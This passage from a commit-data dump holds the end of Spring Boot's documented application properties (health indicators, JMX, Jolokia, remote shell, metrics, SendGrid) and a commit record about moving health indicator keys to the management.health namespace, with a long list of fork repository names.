* allows all headers.\n\tendpoints.cors.exposed-headers= # comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # how long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true\n\tmanagement.health.elasticsearch.enabled=true\n\tmanagement.health.elasticsearch.indices= # comma-separated index names\n\tmanagement.health.elasticsearch.response-timeout=100 # the time, in milliseconds, to wait for a response from the cluster\n\tmanagement.health.diskspace.enabled=true\n\tmanagement.health.diskspace.path=.\n\tmanagement.health.diskspace.threshold=10485760\n\tmanagement.health.jms.enabled=true\n\tmanagement.health.mail.enabled=true\n\tmanagement.health.mongo.enabled=true\n\tmanagement.health.rabbit.enabled=true\n\tmanagement.health.redis.enabled=true\n\tmanagement.health.solr.enabled=true\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=\/jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true # enable JMX export of all endpoints\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # comma-separated list of commands to disable\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.enabled=true # flag to disable all metric exports (assuming any MetricWriters are available)\n\tspring.metrics.export.delay-millis=5000 # delay in milliseconds between export ticks\n\tspring.metrics.export.send-latest=true # flag to switch off any available optimizations based on not exporting unchanged metric values\n\tspring.metrics.export.includes= # list of patterns for metric names to include\n\tspring.metrics.export.excludes= # list of patterns for metric names to exclude. 
Applied after the includes\n\tspring.metrics.export.redis.prefix=spring.metrics # prefix for redis repository if active\n\tspring.metrics.export.redis.key=keys.spring.metrics # key for redis repository export (if active)\n\tspring.metrics.export.triggers.*= # specific trigger properties per MetricWriter bean name\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2416a935e6ca64b76a917a2287c12fe7fb3653b0","subject":"Properly document health indicator config","message":"Properly document health indicator config\n\nHealth indicator configuration keys have moved from the health.* to the\nmanagement.health.* namespace. This commit makes sure that these are\ndocumented properly in 1.1.x as well.\n\nSee gh-2118\n","repos":"tsachev\/spring-boot,linead\/spring-boot,lucassaldanha\/spring-boot,mebinjacob\/spring-boot,bsodzik\/spring-boot,pnambiarsf\/spring-boot,lenicliu\/spring-boot,candrews\/spring-boot,marcellodesales\/spring-boot,liupd\/spring-boot,Xaerxess\/spring-boot,eliudiaz\/spring-boot,pnambiarsf\/spring-boot,yangdd1205\/spring-boot,jrrickard\/spring-boot,existmaster\/spring-boot,shangyi0102\/spring-boot,christian-posta\/spring-boot,liupugong\/spring-boot,fulvio-m\/spring-boot,yuxiaole\/spring-boot,nghialunhaiha\/spring-boot,jbovet\/spring-boot,roymanish\/spring-boot,zorosteven\/spring-boot,lexandro\/spring-boot,joshthornhill\/spring-boot,ameraljovic\/spring-boot,izestrea\/spring-boot,philwebb\/spring-boot,donhuvy\/spring-boot,crackien\/spring-boot,bclozel\/spring-boot,liupugong\/spring-boot,mosen11\/spring-boot,smilence1986\/spring-boot,JiweiWong\/spring-boot,hqrt\/jenkins2-course-spring-boot,mosen11\/spring-boot,mbogoevici\/spring-boot,fireshort\/spring-boot,sankin\/spring-boot,M3lkior\/spring-boot,nisuhw\/spring-boot,wilkinsona\/spring-boot,clarklj001\/spring-boot,5zzang\/spring-boot,buobao\/spring-boot,yuxiaole\/spring-boot,lucassaldanha\/spring-boot,wwadge\/spring-boot,artembilan\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,huangyugui\/spring-boot,vakninr\/spring-boot,eddumelendez\/spring-boot,nurkiewicz\/spring-boot,NetoDevel\/spring-boot,vpavic\/spring-boot,dnsw83\/spring-boot,rizwan18\/spring-boot,fireshort\/spring-boot,mrumpf\/spring-boot,gauravbrills\/spring-boot,gauravbrills\/spring-boot,durai145\/spring-boot,MasterRoots\/spring-boot,tsachev\/spring-boot,i007422\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,bjornlindstrom\/spring-boot,166yuan\/spring-boot,designreuse\/spring-boot,hklv\/spring-boot,forestqqqq\/spring-boot,RobertNickens\/spring-boot,DeezCashews\/spring-boot,10045125\/spring-boot,izeye\/spring-boot,SaravananParthasarathy\/SPSDemo,deki\/spring-boot,tbadie\/spring-boot,designreuse\/spring-boot,MasterRoots\/spring-boot,Pokbab\/spring-boot,tan9\/spring-boot,RainPlanter\/spring-boot,donthadineshkumar\/spring-boot,peteyan\/spring-boot,tbbost\/spring-boot,prakashme\/spring-boot,izestrea\/spring-boot,durai145\/spring-boot,wilkinsona\/spring-boot,yhj630520\/spring-boot,royclarkson\/spring-boot,mbrukman\/spring-boot,ralenmandao\/spring-boot,donthadineshkumar\/spring-boot,keithsjohnson\/spring-
boot,end-user\/spring-boot,balajinsr\/spring-boot,akmaharshi\/jenkins,thomasdarimont\/spring-boot,wwadge\/spring-boot,PraveenkumarShethe\/spring-boot,npcode\/spring-boot,PraveenkumarShethe\/spring-boot,rstirling\/spring-boot,tsachev\/spring-boot,jcastaldoFoodEssentials\/spring-boot,lingounet\/spring-boot,ptahchiev\/spring-boot,nghialunhaiha\/spring-boot,hello2009chen\/spring-boot,Nowheresly\/spring-boot,mouadtk\/spring-boot,AstaTus\/spring-boot,ydsakyclguozi\/spring-boot,qq83387856\/spring-boot,bbrouwer\/spring-boot,axelfontaine\/spring-boot,Makhlab\/spring-boot,minmay\/spring-boot,Charkui\/spring-boot,meftaul\/spring-boot,scottfrederick\/spring-boot,auvik\/spring-boot,mbenson\/spring-boot,mbnshankar\/spring-boot,izeye\/spring-boot,5zzang\/spring-boot,RobertNickens\/spring-boot,satheeshmb\/spring-boot,mackeprm\/spring-boot,axibase\/spring-boot,mdeinum\/spring-boot,pvorb\/spring-boot,keithsjohnson\/spring-boot,qq83387856\/spring-boot,rmoorman\/spring-boot,domix\/spring-boot,jvz\/spring-boot,jjankar\/spring-boot,jcastaldoFoodEssentials\/spring-boot,ralenmandao\/spring-boot,vakninr\/spring-boot,jack-luj\/spring-boot,roymanish\/spring-boot,eonezhang\/spring-boot,5zzang\/spring-boot,paweldolecinski\/spring-boot,soul2zimate\/spring-boot,tiarebalbi\/spring-boot,vakninr\/spring-boot,mosoft521\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,felipeg48\/spring-boot,jbovet\/spring-boot,donhuvy\/spring-boot,meloncocoo\/spring-boot,gorcz\/spring-boot,tbadie\/spring-boot,imranansari\/spring-boot,allyjunio\/spring-boot,meftaul\/spring-boot,bbrouwer\/spring-boot,liupd\/spring-boot,Pokbab\/spring-boot,nevenc-pivotal\/spring-boot,coolcao\/spring-boot,xingguang2013\/spring-boot,xdweleven\/spring-boot,balajinsr\/spring-boot,lburgazzoli\/spring-boot,tbadie\/spring-boot,Buzzardo\/spring-boot,bijukunjummen\/spring-boot,smayoorans\/spring-boot,bclozel\/spring-boot,xiaoleiPENG\/my-project,smayoorans\/spring-boot,drumonii\/spring-boot,Nowheresly\/spring-boot,dnsw83\/spring-boot,nelswadycki\/spring-boot,sebastiankirsch\/spring-boot,rams2588\/spring-boot,wwadge\/spring-boot,dfa1\/spring-boot,krmcbride\/spring-boot,akmaharshi\/jenkins,jack-luj\/spring-boot,panbiping\/spring-boot,bbrouwer\/spring-boot,ollie314\/spring-boot,ApiSecRay\/spring-boot,sbuettner\/spring-boot,shakuzen\/spring-boot,zhangshuangquan\/spring-root,cmsandiga\/spring-boot,wilkinsona\/spring-boot,sbcoba\/spring-boot,murilobr\/spring-boot,yangdd1205\/spring-boot,nghiavo\/spring-boot,joshiste\/spring-boot,SPNilsen\/spring-boot,frost2014\/spring-boot,philwebb\/spring-boot,brettwooldridge\/spring-boot,vpavic\/spring-boot,lenicliu\/spring-boot,master-slave\/spring-boot,ralenmandao\/spring-boot,mbrukman\/spring-boot,nghiavo\/spring-boot,michael-simons\/spring-boot,jforge\/spring-boot,brettwooldridge\/spring-boot,lexandro\/spring-boot,huangyugui\/spring-boot,artembilan\/spring-boot,ilayaperumalg\/spring-boot,ollie314\/spring-boot,donthadineshkumar\/spring-boot,domix\/spring-boot,prasenjit-net\/spring-boot,raiamber1\/spring-boot,hklv\/spring-boot,habuma\/spring-boot,paddymahoney\/spring-boot,JiweiWong\/spring-boot,RobertNickens\/spring-boot,Chomeh\/spring-boot,srinivasan01\/spring-boot,lokbun\/spring-boot,SPNilsen\/spring-boot,eliudiaz\/spring-boot,imranansari\/spring-boot,hehuabing\/spring-boot,ihoneymon\/spring-boot,mabernardo\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,donhuvy\/spring-boot,jvz\/spring-boot,cleverjava\/jenkins2-course-spring-boot,kiranbpatil\/spring-boot,trecloux\/spring-boot,duandf35\/spring-boot,vaseemahmed01\/spring-boo
t,lcardito\/spring-boot,mlc0202\/spring-boot,ihoneymon\/spring-boot,donthadineshkumar\/spring-boot,nisuhw\/spring-boot,domix\/spring-boot,zorosteven\/spring-boot,orangesdk\/spring-boot,imranansari\/spring-boot,trecloux\/spring-boot,joshiste\/spring-boot,xc145214\/spring-boot,qerub\/spring-boot,orangesdk\/spring-boot,kamilszymanski\/spring-boot,ihoneymon\/spring-boot,DONIKAN\/spring-boot,navarrogabriela\/spring-boot,joansmith\/spring-boot,neo4j-contrib\/spring-boot,pvorb\/spring-boot,isopov\/spring-boot,okba1\/spring-boot,domix\/spring-boot,donhuvy\/spring-boot,tiarebalbi\/spring-boot,gorcz\/spring-boot,akmaharshi\/jenkins,ojacquemart\/spring-boot,i007422\/jenkins2-course-spring-boot,master-slave\/spring-boot,tbbost\/spring-boot,yunbian\/spring-boot,linead\/spring-boot,mouadtk\/spring-boot,lokbun\/spring-boot,marcellodesales\/spring-boot,vpavic\/spring-boot,mabernardo\/spring-boot,tiarebalbi\/spring-boot,snicoll\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,balajinsr\/spring-boot,herau\/spring-boot,Nowheresly\/spring-boot,lingounet\/spring-boot,xialeizhou\/spring-boot,coolcao\/spring-boot,existmaster\/spring-boot,xc145214\/spring-boot,ydsakyclguozi\/spring-boot,satheeshmb\/spring-boot,nevenc-pivotal\/spring-boot,murilobr\/spring-boot,RishikeshDarandale\/spring-boot,cmsandiga\/spring-boot,pnambiarsf\/spring-boot,Pokbab\/spring-boot,joansmith\/spring-boot,scottfrederick\/spring-boot,NetoDevel\/spring-boot,mbenson\/spring-boot,xc145214\/spring-boot,vandan16\/Vandan,mrumpf\/spring-boot,chrylis\/spring-boot,kayelau\/spring-boot,hehuabing\/spring-boot,mabernardo\/spring-boot,rmoorman\/spring-boot,kamilszymanski\/spring-boot,ChunPIG\/spring-boot,mdeinum\/spring-boot,fulvio-m\/spring-boot,drumonii\/spring-boot,ptahchiev\/spring-boot,PraveenkumarShethe\/spring-boot,spring-projects\/spring-boot,ralenmandao\/spring-boot,nelswadycki\/spring-boot,paweldolecinski\/spring-boot,RishikeshDarandale\/spring-boot,RichardCSantana\/spring-boot,damoyang\/spring-boot,SPNilsen\/spring-boot,mosoft521\/spring-boot,soul2zimate\/spring-boot,joshthornhill\/spring-boot,royclarkson\/spring-boot,brettwooldridge\/spring-boot,designreuse\/spring-boot,jeremiahmarks\/spring-boot,Buzzardo\/spring-boot,wwadge\/spring-boot,patrikbeno\/spring-boot,bbrouwer\/spring-boot,navarrogabriela\/spring-boot,rstirling\/spring-boot,nurkiewicz\/spring-boot,duandf35\/spring-boot,philwebb\/spring-boot-concourse,eric-stanley\/spring-boot,M3lkior\/spring-boot,bijukunjummen\/spring-boot,kamilszymanski\/spring-boot,mbrukman\/spring-boot,dnsw83\/spring-boot,eddumelendez\/spring-boot,xingguang2013\/spring-boot,i007422\/jenkins2-course-spring-boot,Xaerxess\/spring-boot,mbnshankar\/spring-boot,meloncocoo\/spring-boot,duandf35\/spring-boot,johnktims\/spring-boot,jvz\/spring-boot,nareshmiriyala\/spring-boot,drumonii\/spring-boot,playleud\/spring-boot,durai145\/spring-boot,srikalyan\/spring-boot,JiweiWong\/spring-boot,philwebb\/spring-boot-concourse,existmaster\/spring-boot,eliudiaz\/spring-boot,mebinjacob\/spring-boot,MrMitchellMoore\/spring-boot,end-user\/spring-boot,okba1\/spring-boot,qerub\/spring-boot,mosoft521\/spring-boot,Chomeh\/spring-boot,Chomeh\/spring-boot,yhj630520\/spring-boot,mrumpf\/spring-boot,htynkn\/spring-boot,rmoorman\/spring-boot,DONIKAN\/spring-boot,dreis2211\/spring-boot,mosen11\/spring-boot,jforge\/spring-boot,javyzheng\/spring-boot,nisuhw\/spring-boot,RichardCSantana\/spring-boot,Buzzardo\/spring-boot,jayarampradhan\/spring-boot,jeremiahmarks\/spring-boot,rickeysu\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,l
ingounet\/spring-boot,nevenc-pivotal\/spring-boot,end-user\/spring-boot,ojacquemart\/spring-boot,ApiSecRay\/spring-boot,ractive\/spring-boot,M3lkior\/spring-boot,nandakishorm\/spring-boot,srinivasan01\/spring-boot,soul2zimate\/spring-boot,izestrea\/spring-boot,sbcoba\/spring-boot,jeremiahmarks\/spring-boot,cbtpro\/spring-boot,javyzheng\/spring-boot,sbuettner\/spring-boot,jorgepgjr\/spring-boot,fjlopez\/spring-boot,eliudiaz\/spring-boot,jrrickard\/spring-boot,prasenjit-net\/spring-boot,ilayaperumalg\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,sungha\/spring-boot,dnsw83\/spring-boot,candrews\/spring-boot,ilayaperumalg\/spring-boot,paweldolecinski\/spring-boot,tan9\/spring-boot,mabernardo\/spring-boot,philwebb\/spring-boot,vaseemahmed01\/spring-boot,mosen11\/spring-boot,bsodzik\/spring-boot,sungha\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,fogone\/spring-boot,eonezhang\/spring-boot,joansmith\/spring-boot,srikalyan\/spring-boot,aahlenst\/spring-boot,VitDevelop\/spring-boot,rams2588\/spring-boot,nghiavo\/spring-boot,tan9\/spring-boot,cmsandiga\/spring-boot,sebastiankirsch\/spring-boot,bsodzik\/spring-boot,meftaul\/spring-boot,zorosteven\/spring-boot,isopov\/spring-boot,cleverjava\/jenkins2-course-spring-boot,chrylis\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,rams2588\/spring-boot,yuxiaole\/spring-boot,jeremiahmarks\/spring-boot,drunklite\/spring-boot,nandakishorm\/spring-boot,dreis2211\/spring-boot,okba1\/spring-boot,nebhale\/spring-boot,ptahchiev\/spring-boot,kiranbpatil\/spring-boot,deki\/spring-boot,sbuettner\/spring-boot,vaseemahmed01\/spring-boot,ydsakyclguozi\/spring-boot,Buzzardo\/spring-boot,crackien\/spring-boot,AstaTus\/spring-boot,sebastiankirsch\/spring-boot,SPNilsen\/spring-boot,candrews\/spring-boot,Chomeh\/spring-boot,axibase\/spring-boot,crackien\/spring-boot,joshiste\/spring-boot,rstirling\/spring-boot,fjlopez\/spring-boot,master-slave\/spring-boot,scottfrederick\/spring-boot,bclozel\/spring-boot,philwebb\/spring-boot-concourse,existmaster\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,krmcbride\/spring-boot,yuxiaole\/spring-boot,jayarampradhan\/spring-boot,ydsakyclguozi\/spring-boot,mohican0607\/spring-boot,ptahchiev\/spring-boot,roberthafner\/spring-boot,afroje-reshma\/spring-boot-sample,neo4j-contrib\/spring-boot,fogone\/spring-boot,hehuabing\/spring-boot,imranansari\/spring-boot,MrMitchellMoore\/spring-boot,ptahchiev\/spring-boot,lif123\/spring-boot,eric-stanley\/spring-boot,lcardito\/spring-boot,tsachev\/spring-boot,na-na\/spring-boot,bsodzik\/spring-boot,roberthafner\/spring-boot,jcastaldoFoodEssentials\/spring-boot,joshiste\/spring-boot,rweisleder\/spring-boot,prakashme\/spring-boot,VitDevelop\/spring-boot,minmay\/spring-boot,gauravbrills\/spring-boot,tbadie\/spring-boot,paddymahoney\/spring-boot,cbtpro\/spring-boot,christian-posta\/spring-boot,meloncocoo\/spring-boot,nebhale\/spring-boot,kayelau\/spring-boot,javyzheng\/spring-boot,spring-projects\/spring-boot,AngusZhu\/spring-boot,hehuabing\/spring-boot,nurkiewicz\/spring-boot,afroje-reshma\/spring-boot-sample,ChunPIG\/spring-boot,scottfrederick\/spring-boot,ApiSecRay\/spring-boot,vaseemahmed01\/spring-boot,ameraljovic\/spring-boot,shangyi0102\/spring-boot,xwjxwj30abc\/spring-boot,jorgepgjr\/spring-boot,mohican0607\/spring-boot,philwebb\/spring-boot,qq83387856\/spring-boot,liupd\/spring-boot,MasterRoots\/spring-boot,npcode\/spring-boot,ollie314\/spring-boot,roberthafner\/spring-boot,roberthafner\/spring-boot,joshthornhill\/spring-boot,allyjunio\/spring-bo
ot,zhanhb\/spring-boot,pvorb\/spring-boot,jvz\/spring-boot,shakuzen\/spring-boot,xwjxwj30abc\/spring-boot,felipeg48\/spring-boot,166yuan\/spring-boot,roberthafner\/spring-boot,ractive\/spring-boot,na-na\/spring-boot,murilobr\/spring-boot,ameraljovic\/spring-boot,xiaoleiPENG\/my-project,patrikbeno\/spring-boot,durai145\/spring-boot,liupugong\/spring-boot,christian-posta\/spring-boot,shakuzen\/spring-boot,lif123\/spring-boot,lingounet\/spring-boot,nelswadycki\/spring-boot,zorosteven\/spring-boot,johnktims\/spring-boot,cbtpro\/spring-boot,deki\/spring-boot,i007422\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,isopov\/spring-boot,xingguang2013\/spring-boot,philwebb\/spring-boot,marcellodesales\/spring-boot,mebinjacob\/spring-boot,mebinjacob\/spring-boot,cmsandiga\/spring-boot,brettwooldridge\/spring-boot,raiamber1\/spring-boot,mbenson\/spring-boot,minmay\/spring-boot,bjornlindstrom\/spring-boot,kamilszymanski\/spring-boot,Pokbab\/spring-boot,orangesdk\/spring-boot,damoyang\/spring-boot,herau\/spring-boot,lenicliu\/spring-boot,mbnshankar\/spring-boot,qq83387856\/spring-boot,fulvio-m\/spring-boot,sbcoba\/spring-boot,tbbost\/spring-boot,cbtpro\/spring-boot,yhj630520\/spring-boot,ractive\/spring-boot,zhangshuangquan\/spring-root,rams2588\/spring-boot,DeezCashews\/spring-boot,dreis2211\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,johnktims\/spring-boot,srinivasan01\/spring-boot,wilkinsona\/spring-boot,thomasdarimont\/spring-boot,javyzheng\/spring-boot,durai145\/spring-boot,xialeizhou\/spring-boot,htynkn\/spring-boot,lexandro\/spring-boot,mbnshankar\/spring-boot,jmnarloch\/spring-boot,xwjxwj30abc\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rizwan18\/spring-boot,rickeysu\/spring-boot,orangesdk\/spring-boot,neo4j-contrib\/spring-boot,jbovet\/spring-boot,mbenson\/spring-boot,forestqqqq\/spring-boot,SPNilsen\/spring-boot,damoyang\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,linead\/spring-boot,brettwooldridge\/spring-boot,kamilszymanski\/spring-boot,ojacquemart\/spring-boot,neo4j-contrib\/spring-boot,mdeinum\/spring-boot,Makhlab\/spring-boot,vandan16\/Vandan,ChunPIG\/spring-boot,mosoft521\/spring-boot,tan9\/spring-boot,javyzheng\/spring-boot,10045125\/spring-boot,tsachev\/spring-boot,crackien\/spring-boot,nebhale\/spring-boot,PraveenkumarShethe\/spring-boot,hklv\/spring-boot,zhanhb\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,DeezCashews\/spring-boot,jeremiahmarks\/spring-boot,srikalyan\/spring-boot,jorgepgjr\/spring-boot,axelfontaine\/spring-boot,lcardito\/spring-boot,herau\/spring-boot,lburgazzoli\/spring-boot,fireshort\/spring-boot,mackeprm\/spring-boot,isopov\/spring-boot,tiarebalbi\/spring-boot,aahlenst\/spring-boot,jjankar\/spring-boot,eonezhang\/spring-boot,mouadtk\/spring-boot,hqrt\/jenkins2-course-spring-boot,lokbun\/spring-boot,lucassaldanha\/spring-boot,xialeizhou\/spring-boot,zorosteven\/spring-boot,RichardCSantana\/spring-boot,master-slave\/spring-boot,ihoneymon\/spring-boot,MasterRoots\/spring-boot,joshiste\/spring-boot,spring-projects\/spring-boot,royclarkson\/spring-boot,na-na\/spring-boot,kiranbpatil\/spring-boot,hello2009chen\/spring-boot,xingguang2013\/spring-boot,Makhlab\/spring-boot,smayoorans\/spring-boot,mouadtk\/spring-boot,deki\/spring-boot,playleud\/spring-boot,royclarkson\/spring-boot,fireshort\/spring-boot,huangyugui\/spring-boot,prasenjit-net\/spring-boot,scottfrederick\/spring-boot,mbnshankar\/spring-boot,mosen11\/spring-boot,SaravananParthasarathy\/SPSDemo,Nowheresly\/spring-boot,shangy
i0102\/spring-boot,nevenc-pivotal\/spring-boot,jayeshmuralidharan\/spring-boot,RainPlanter\/spring-boot,dfa1\/spring-boot,AstaTus\/spring-boot,xdweleven\/spring-boot,ollie314\/spring-boot,thomasdarimont\/spring-boot,jxblum\/spring-boot,habuma\/spring-boot,rizwan18\/spring-boot,mouadtk\/spring-boot,nareshmiriyala\/spring-boot,trecloux\/spring-boot,AngusZhu\/spring-boot,existmaster\/spring-boot,mrumpf\/spring-boot,minmay\/spring-boot,lenicliu\/spring-boot,jorgepgjr\/spring-boot,master-slave\/spring-boot,MrMitchellMoore\/spring-boot,lexandro\/spring-boot,mbrukman\/spring-boot,lif123\/spring-boot,yunbian\/spring-boot,coolcao\/spring-boot,NetoDevel\/spring-boot,M3lkior\/spring-boot,Charkui\/spring-boot,vandan16\/Vandan,prakashme\/spring-boot,mohican0607\/spring-boot,ilayaperumalg\/spring-boot,yuxiaole\/spring-boot,balajinsr\/spring-boot,wilkinsona\/spring-boot,designreuse\/spring-boot,drumonii\/spring-boot,raiamber1\/spring-boot,izestrea\/spring-boot,buobao\/spring-boot,balajinsr\/spring-boot,auvik\/spring-boot,drunklite\/spring-boot,xc145214\/spring-boot,huangyugui\/spring-boot,bsodzik\/spring-boot,end-user\/spring-boot,jcastaldoFoodEssentials\/spring-boot,i007422\/jenkins2-course-spring-boot,felipeg48\/spring-boot,kdvolder\/spring-boot,playleud\/spring-boot,isopov\/spring-boot,marcellodesales\/spring-boot,drunklite\/spring-boot,dreis2211\/spring-boot,simonnordberg\/spring-boot,rickeysu\/spring-boot,philwebb\/spring-boot-concourse,murilobr\/spring-boot,buobao\/spring-boot,fulvio-m\/spring-boot,mackeprm\/spring-boot,philwebb\/spring-boot-concourse,hklv\/spring-boot,srinivasan01\/spring-boot,vpavic\/spring-boot,RainPlanter\/spring-boot,smilence1986\/spring-boot,coolcao\/spring-boot,olivergierke\/spring-boot,buobao\/spring-boot,herau\/spring-boot,RichardCSantana\/spring-boot,rstirling\/spring-boot,JiweiWong\/spring-boot,axelfontaine\/spring-boot,vandan16\/Vandan,isopov\/spring-boot,qerub\/spring-boot,nelswadycki\/spring-boot,jayeshmuralidharan\/spring-boot,RishikeshDarandale\/spring-boot,rweisleder\/spring-boot,michael-simons\/spring-boot,mike-kukla\/spring-boot,jrrickard\/spring-boot,zhangshuangquan\/spring-root,zhanhb\/spring-boot,izestrea\/spring-boot,VitDevelop\/spring-boot,tbadie\/spring-boot,liupd\/spring-boot,yhj630520\/spring-boot,krmcbride\/spring-boot,yunbian\/spring-boot,playleud\/spring-boot,Xaerxess\/spring-boot,marcellodesales\/spring-boot,Makhlab\/spring-boot,spring-projects\/spring-boot,olivergierke\/spring-boot,bijukunjummen\/spring-boot,roymanish\/spring-boot,sankin\/spring-boot,imranansari\/spring-boot,Charkui\/spring-boot,JiweiWong\/spring-boot,RishikeshDarandale\/spring-boot,christian-posta\/spring-boot,artembilan\/spring-boot,RainPlanter\/spring-boot,simonnordberg\/spring-boot,roymanish\/spring-boot,afroje-reshma\/spring-boot-sample,spring-projects\/spring-boot,nghiavo\/spring-boot,eddumelendez\/spring-boot,paweldolecinski\/spring-boot,okba1\/spring-boot,drumonii\/spring-boot,chrylis\/spring-boot,ilayaperumalg\/spring-boot,soul2zimate\/spring-boot,clarklj001\/spring-boot,forestqqqq\/spring-boot,nevenc-pivotal\/spring-boot,meloncocoo\/spring-boot,qerub\/spring-boot,olivergierke\/spring-boot,jxblum\/spring-boot,jcastaldoFoodEssentials\/spring-boot,rizwan18\/spring-boot,hklv\/spring-boot,rickeysu\/spring-boot,playleud\/spring-boot,domix\/spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,bjornlindstrom\/spring-boot,olivergierke\/spring-boot,linead\/spring-boot,tbbost\/spring-boot,sungha\/spring-boot,smilence1986\/spring-boot,cbtpro\/spring-boot,lokbun\/spring-
boot,nebhale\/spring-boot,zhanhb\/spring-boot,nghiavo\/spring-boot,panbiping\/spring-boot,mlc0202\/spring-boot,lenicliu\/spring-boot,raiamber1\/spring-boot,nisuhw\/spring-boot,allyjunio\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,PraveenkumarShethe\/spring-boot,auvik\/spring-boot,patrikbeno\/spring-boot,vakninr\/spring-boot,lexandro\/spring-boot,na-na\/spring-boot,vaseemahmed01\/spring-boot,5zzang\/spring-boot,chrylis\/spring-boot,gorcz\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,nghialunhaiha\/spring-boot,mike-kukla\/spring-boot,vakninr\/spring-boot,simonnordberg\/spring-boot,axibase\/spring-boot,afroje-reshma\/spring-boot-sample,liupugong\/spring-boot,duandf35\/spring-boot,mbenson\/spring-boot,donhuvy\/spring-boot,panbiping\/spring-boot,lburgazzoli\/spring-boot,frost2014\/spring-boot,tbbost\/spring-boot,thomasdarimont\/spring-boot,mike-kukla\/spring-boot,izeye\/spring-boot,mbogoevici\/spring-boot,ollie314\/spring-boot,mbogoevici\/spring-boot,M3lkior\/spring-boot,bclozel\/spring-boot,mbogoevici\/spring-boot,prakashme\/spring-boot,jmnarloch\/spring-boot,166yuan\/spring-boot,mbenson\/spring-boot,na-na\/spring-boot,paweldolecinski\/spring-boot,habuma\/spring-boot,jmnarloch\/spring-boot,ractive\/spring-boot,mbogoevici\/spring-boot,VitDevelop\/spring-boot,wilkinsona\/spring-boot,krmcbride\/spring-boot,yunbian\/spring-boot,trecloux\/spring-boot,rmoorman\/spring-boot,meloncocoo\/spring-boot,michael-simons\/spring-boot,peteyan\/spring-boot,xdweleven\/spring-boot,neo4j-contrib\/spring-boot,prasenjit-net\/spring-boot,NetoDevel\/spring-boot,ojacquemart\/spring-boot,mrumpf\/spring-boot,minmay\/spring-boot,sbuettner\/spring-boot,jayarampradhan\/spring-boot,xiaoleiPENG\/my-project,auvik\/spring-boot,fogone\/spring-boot,DONIKAN\/spring-boot,jjankar\/spring-boot,johnktims\/spring-boot,smilence1986\/spring-boot,VitDevelop\/spring-boot,huangyugui\/spring-boot,mdeinum\/spring-boot,lif123\/spring-boot,eric-stanley\/spring-boot,jforge\/spring-boot,ApiSecRay\/spring-boot,dfa1\/spring-boot,keithsjohnson\/spring-boot,aahlenst\/spring-boot,sbcoba\/spring-boot,rstirling\/spring-boot,izeye\/spring-boot,10045125\/spring-boot,joansmith\/spring-boot,rizwan18\/spring-boot,izeye\/spring-boot,jack-luj\/spring-boot,AstaTus\/spring-boot,zhanhb\/spring-boot,xiaoleiPENG\/my-project,jforge\/spring-boot,Charkui\/spring-boot,mlc0202\/spring-boot,habuma\/spring-boot,akmaharshi\/jenkins,shakuzen\/spring-boot,clarklj001\/spring-boot,AstaTus\/spring-boot,rweisleder\/spring-boot,nebhale\/spring-boot,zhangshuangquan\/spring-root,hello2009chen\/spring-boot,ptahchiev\/spring-boot,xialeizhou\/spring-boot,nareshmiriyala\/spring-boot,keithsjohnson\/spring-boot,christian-posta\/spring-boot,cleverjava\/jenkins2-course-spring-boot,akmaharshi\/jenkins,RishikeshDarandale\/spring-boot,jjankar\/spring-boot,joshthornhill\/spring-boot,duandf35\/spring-boot,eddumelendez\/spring-boot,michael-simons\/spring-boot,fogone\/spring-boot,hqrt\